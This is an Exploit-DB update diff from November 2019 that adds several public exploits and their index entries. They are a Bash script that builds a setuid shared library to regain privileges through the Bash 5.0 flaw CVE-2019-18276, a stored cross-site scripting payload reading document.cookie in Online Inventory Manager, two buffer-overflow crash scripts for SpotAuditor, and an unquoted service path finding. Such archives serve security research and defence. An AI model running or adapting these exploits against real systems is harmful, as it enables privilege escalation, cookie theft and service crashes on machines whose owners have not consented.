DB: 2019-11-30

8 changes to exploits/shellcodes

SpotAuditor 5.3.2 - 'Key' Denial of Service
SpotAuditor 5.3.2 - 'Name' Denial of Service
TexasSoft CyberPlanet 6.4.131 - 'CCSrvProxy' Unquoted Service Path
Bash 5.0 Patch 11 -  SUID Priv Drop Exploit

Mersive Solstice 2.8.0 - Remote Code Execution
Online Inventory Manager 3.2 - Persistent Cross-Site Scripting

exploits/linux/local/47726.sh

@@ -0,0 +1,70 @@
+# Exploit Title : Bash 5.0 Patch 11 -  SUID Priv Drop Exploit
+# Date : 2019-11-29
+# Original Author: Ian Pudney , Chet Ramey
+# Exploit Author : Mohin Paramasivam (Shad0wQu35t)
+# Version : < Bash 5.0 Patch 11
+# Tested on Linux
+# Credit : Ian Pudney from Google Security and Privacy Team based on Google CTF suidbash
+# CVE : 2019-18276
+# CVE Link : https://nvd.nist.gov/vuln/detail/CVE-2019-18276 , https://www.youtube.com/watch?v=-wGtxJ8opa8
+# Exploit Demo POC : https://youtu.be/Dbwvzbb38W0
+
+Description :
+
+An issue was discovered in disable_priv_mode in shell.c in GNU Bash through 5.0 patch 11.
+By default, if Bash is run with its effective UID not equal to its real UID,
+it will drop privileges by setting its effective UID to its real UID.
+However, it does so incorrectly. On Linux and other systems that support "saved UID" functionality,
+the saved UID is not dropped. An attacker with command execution in the shell can use "enable -f" for
+runtime loading of a new builtin, which can be a shared object that calls setuid() and therefore
+regains privileges. However, binaries running with an effective UID of 0 are unaffected.
+
+#!/bin/bash
+
+
+#Terminal Color Codes
+
+RED='\033[0;31m'
+GREEN='\033[0;32m'
+NC='\033[0m'
+
+
+#Get the Effective User ID (owner of the SUID /bin/bash binary)
+read -p "Please enter effective user id (euid) : " euid
+
+#Create a C file and output the exploit code
+touch pwn.c
+echo "" > pwn.c
+
+cat <<EOT >> pwn.c
+
+#include <sys/types.h>
+#include <unistd.h>
+#include <stdio.h>
+ 
+void __attribute((constructor)) initLibrary(void) {
+        printf("Escape lib is initialized");
+        printf("[LO] uid:%d | euid:%d%c", getuid(), geteuid());  
+        setuid($euid);
+        printf("[LO] uid%d | euid:%d%c", getuid(), geteuid());
+}
+
+EOT
+
+echo -e  "${RED}"
+echo -e "Exploit Code copied to pwn.c !\n"
+sleep 5
+echo -e "Compiling Exploit Object ! \n"
+$(which gcc ) -c -fPIC pwn.c -o pwn.o
+sleep 5
+echo -e "Compiling Exploit Shared Object ! \n"
+$(which gcc ) -shared -fPIC pwn.o -o libpwn.so
+sleep 5
+echo -e "Exploit Compiled ! \n"
+sleep 5
+echo -e "Executing Exploit :)  \n"
+sleep 5
+
+
+#Execute the Shared Library
+echo -e "${RED}Run  : ${NC} enable -f ./libpwn.so asd \n"

exploits/php/webapps/47725.txt

@@ -0,0 +1,23 @@
+# Exploit Title: Online Inventory Manager 3.2 - Persistent Cross-Site Scripting
+# Date: 2019-11-29
+# Exploit Author: Cemal Cihad ÇİFTÇİ
+# Vendor Homepage: https://bigprof.com
+# Software Link : https://bigprof.com/appgini/applications/online-inventory-manager
+# Software : Online Inventory Manager
+# Version : 3.2
+# Vulernability Type : Cross-site Scripting
+# Vulenrability : Stored XSS
+# Tested on: Windows 10 Pro
+
+# Stored XSS has been discovered in the Online Inventory Manager created by bigprof/AppGini
+# editgroups section. In editgroups section
+# (http://localhost/inventory/admin/pageEditGroup.php?groupID=1).
+
+# Payload i used:
+"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>"
+
+# POC: http://localhost/inventory/admin/pageViewGroups.php in this
+# url you can edit the groups information with pressing onto the group name. After the edit page open
+# you can enter your payload into the description field. After going back to
+# the groups page you will see your Javascript code gonna run.
+# This vulnerability is also exist while you are creating a new group.

exploits/windows/dos/47723.py

@@ -0,0 +1,31 @@
+#Exploit Title: SpotAuditor 5.3.2 - 'Key' Denial of Service
+#Exploit Author : ZwX
+#Exploit Date: 2019-11-28
+#Vendor Homepage : http://www.nsauditor.com/
+#Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
+#Tested on OS: Windows 7
+#Social: twitter.com/ZwX2a
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install SpotAuditor
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Key' and click on 'Ok'
+6.SpotAuditor Crashed
+'''
+#!/usr/bin/python
+
+http = "http//"
+buffer = "\x41" * 2000
+
+
+poc = http + buffer 
+file = open("poc.txt","w")
+file.write(poc)
+file.close()
+ 
+print "POC Created by ZwX"

exploits/windows/dos/47727.py

@@ -0,0 +1,32 @@
+#Exploit Title: SpotAuditor 5.3.2 - 'Name' Denial Of Service
+#Exploit Author : ZwX
+#Exploit Date: 2019-11-28
+#Vendor Homepage : http://www.nsauditor.com/
+#Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
+#Tested on OS: Windows 7
+#Social: twitter.com/ZwX2a
+#contact: msk4@live.fr
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install SpotAuditor
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Name' and click on 'Ok'
+6.SpotAuditor Crashed
+'''
+#!/usr/bin/python
+
+http = "http//"
+buffer = "\x41" * 2000
+
+
+poc = http + buffer 
+file = open("poc.txt","w")
+file.write(poc)
+file.close()
+ 
+print "POC Created by ZwX"

exploits/windows/local/47724.txt

@@ -0,0 +1,35 @@
+# Exploit Title: TexasSoft CyberPlanet 6.4.131 - 'CCSrvProxy' Unquoted Service Path
+# Date: 2019-11-28
+# Exploit Author: Cristian Ayala G
+# Vendor Homepage: https://tenaxsoft.com/index.html
+# Software Link: https://tenaxsoft.com/descargas.html
+# Version: 6.4.131
+# Tested on: Windows 10 Pro x64
+
+##########################################################################
+
+# Step to discover the unquoted Service:
+
+C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr -i "auto" | findstr -i -v "C:\Windows\\ | findstr """
+CCSrvProxy	CCSrvProxy	 C:\Program Files (x86)\TenaxSoft\CyberPlanet\SrvProxy.exe	Auto
+Control de impresiones Tenax	ControldeImpresiones	C:\Program Files (x86)\TenaxSoft\CyberPlanet\TenaxService64.exe	Auto
+
+##########################################################################
+
+# Service info:
+
+C:\Users\user>sc qc CCSrvProxy
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: CCSrvProxy
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\TenaxSoft\CyberPlanet\SrvProxy.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : CCSrvProxy
+        DEPENDENCIAS       : Spooler
+        NOMBRE_INICIO_SERVICIO: LocalSystem
+
+##########################################################################

files_exploits.csv

@@ -6612,6 +6612,8 @@ id,file,description,date,author,type,platform,port
 47718,exploits/windows/dos/47718.py,"Microsoft DirectX SDK 2010 - '.PIXrun' Denial Of Service (PoC)",2019-11-27,ZwX,dos,windows,
 47719,exploits/windows/dos/47719.py,"SpotAuditor 5.3.2 - 'Base64' Denial Of Service (PoC)",2019-11-27,ZwX,dos,windows,
 47721,exploits/ios/dos/47721.py,"GHIA CamIP 1.2 for iOS - 'Password' Denial of Service (PoC)",2019-11-28,"Ivan Marmolejo",dos,ios,
+47723,exploits/windows/dos/47723.py,"SpotAuditor 5.3.2 - 'Key' Denial of Service",2019-11-29,ZwX,dos,windows,
+47727,exploits/windows/dos/47727.py,"SpotAuditor 5.3.2 - 'Name' Denial of Service",2019-11-29,ZwX,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10813,6 +10815,8 @@ id,file,description,date,author,type,platform,port
 47713,exploits/windows/local/47713.txt,"Microsoft Windows AppXsvc Deployment Extension - Privilege Escalation",2019-11-25,"Abdelhamid Naceri",local,windows,
 47714,exploits/windows/local/47714.md,"VMware WorkStation 12.5.5 - Virtual Machine Escape",2017-08-08,unamer,local,windows,
 47715,exploits/windows/local/47715.md,"VMware WorkStation 12.5.3 - Virtual Machine Escape",2019-06-06,unamer,local,windows,
+47724,exploits/windows/local/47724.txt,"TexasSoft CyberPlanet 6.4.131 - 'CCSrvProxy' Unquoted Service Path",2019-11-29,"Cristian Ayala G",local,windows,
+47726,exploits/linux/local/47726.sh,"Bash 5.0 Patch 11 -  SUID Priv Drop Exploit",2019-11-29,"Mohin Paramasivam",local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42033,4 +42037,5 @@ id,file,description,date,author,type,platform,port
 47702,exploits/hardware/webapps/47702.txt,"TestLink 1.9.19 - Persistent Cross-Site Scripting",2019-11-21,"Milad Khoshdel",webapps,hardware,
 47704,exploits/hardware/webapps/47704.txt,"Network Management Card 6.2.0 - Host Header Injection",2019-11-21,"Amal E Thamban",webapps,hardware,
 47720,exploits/php/webapps/47720.txt,"Wordpress 5.3 - User Disclosure",2019-11-28,SajjadBnd,webapps,php,
-47722,exploits/hardware/webapps/47722.py,"Mersive Solstice 2.8.0 - Remote Code Execution",2019-11-28,"Alexandre Teyar",webapps,hardware,
+47722,exploits/android/webapps/47722.py,"Mersive Solstice 2.8.0 - Remote Code Execution",2019-11-28,"Alexandre Teyar",webapps,android,
+47725,exploits/php/webapps/47725.txt,"Online Inventory Manager 3.2 - Persistent Cross-Site Scripting",2019-11-29,"Cemal Cihad ÇİFTÇİ",webapps,php,